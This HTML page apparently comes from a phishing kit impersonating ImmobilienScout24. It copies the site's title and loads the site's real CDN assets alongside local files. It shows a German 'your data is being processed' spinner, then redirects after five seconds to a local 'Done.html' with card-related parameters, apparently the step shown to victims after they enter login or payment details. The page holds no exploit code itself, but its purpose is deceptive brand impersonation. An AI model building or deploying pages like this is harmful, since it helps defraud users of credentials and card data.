<!DOCTYPE html>
<html class="height-full">
<head>
    <meta charset="UTF-8"/>
    <meta name="viewport"
          content="width=device-width, initial-scale=1, user-scalable=no"/>
    <meta name="msapplication-config" content="none"/>
    <meta name="referrer" content="origin"/>
    <title>Welcome - ImmobilienScout24</title>

		<link rel="icon" type="image/vnd.microsoft.icon" href="./favicon.ico"/>
		<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="./favicon.ico"/>
		
    <link rel="stylesheet" type="text/css" href="./style.css"/>
    <link rel="stylesheet" type="text/css" href="https://www.static-immobilienscout24.de/fro/core/6.3.0/css/core.min.css" />
    <link rel="stylesheet" type="text/css" href="https://www.static-immobilienscout24.de/fro/cosma-ui-icons/6.11.0/s24-icons.css" />
    <link rel="stylesheet" type="text/css" href="https://sso.immobilienscout24.de/css/sso.min.css"/>
    <script type="text/javascript" src="https://www.static-immobilienscout24.de/fro/jquery/3.6.2/jquery.min.js"></script>
    <script type="text/javascript" src="https://www.static-immobilienscout24.de/fro/jquery-ui-autocomplete/1.12.1/jquery-ui-autocomplete.min.js"></script>
    <script type="text/javascript" src="https://www.static-immobilienscout24.de/fro/core/6.3.0/js/core.min.js"></script>
    <link rel="stylesheet" href="https://www.static-immobilienscout24.de/fro/gac/4.0.11/gac.css"/>
    <script type="text/javascript" src="https://www.static-immobilienscout24.de/fro/gac/4.0.11/gac.min.js"></script>
    <script type="text/javascript" src="https://sso.immobilienscout24.de/js/sso.min.js"></script>
    <script type="text/javascript" src="https://sso.immobilienscout24.de/js/sjcl.js"></script>
    <script type="text/javascript" src="https://823579eddc51.edge.sdk.awswaf.com/823579eddc51/b8c8a05d32d1/challenge.js" async></script>
    <script src="https://global.oktacdn.com/okta-auth-js/6.0.0/okta-auth-js.min.js" type="text/javascript"></script>
    
    <style>
      .loading-wrapper {
        display: flex;
        justify-content: center;
        align-items: center;
        height: 80vh;
        flex-direction: column;
        font-family: Arial, sans-serif;
      }

      .spinner {
        border: 6px solid #f3f3f3;
        border-top: 6px solid #0070c9;
        border-radius: 50%;
        width: 50px;
        height: 50px;
        animation: spin 1s linear infinite;
        margin-bottom: 20px;
      }

      @keyframes spin {
        0% { transform: rotate(0deg); }
        100% { transform: rotate(360deg); }
      }

      .loading-text {
        font-size: 18px;
        color: #333;
      }
    </style>
</head>

<body>
    <div class="loading-wrapper">
        <div class="spinner"></div>
        <div class="loading-text" style=" text-align: center; ">Bitte warten Sie, Ihre Daten werden verarbeitet...</div>
    </div>
</body>
<script>
  setTimeout(() => {
    window.location.href = "Done.html?vc?__event=card&service_id=top_card=DE";
  }, 5000);
</script>

</html>
